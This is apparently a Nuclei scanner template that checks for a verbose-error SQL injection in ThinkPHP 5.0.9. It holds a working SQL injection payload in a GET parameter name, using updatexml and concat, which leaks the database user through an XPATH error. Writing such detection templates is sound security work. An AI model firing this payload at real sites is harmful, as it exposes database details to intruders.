id: thinkphp-509-information-disclosure

info:
  name: ThinkPHP 5.0.9 - Information Disclosure
  author: dr_set
  severity: critical
  description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
  metadata:
    max-request: 1
  tags: thinkphp,vulhub,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SQLSTATE"
          - "XPATH syntax error"
        condition: and

      - type: status
        status:
          - 500
# digest: 4a0a00473045022035629940f0b8cb2e423be057c679f042500a53c19d8b541877c846fbe105a222022100976e714d20880ee1aa5fe53e7ad4a7dcf699e7f7d3f2734f0dfc7918fe17f32c:922c64590222798bb761d5b6d8e72950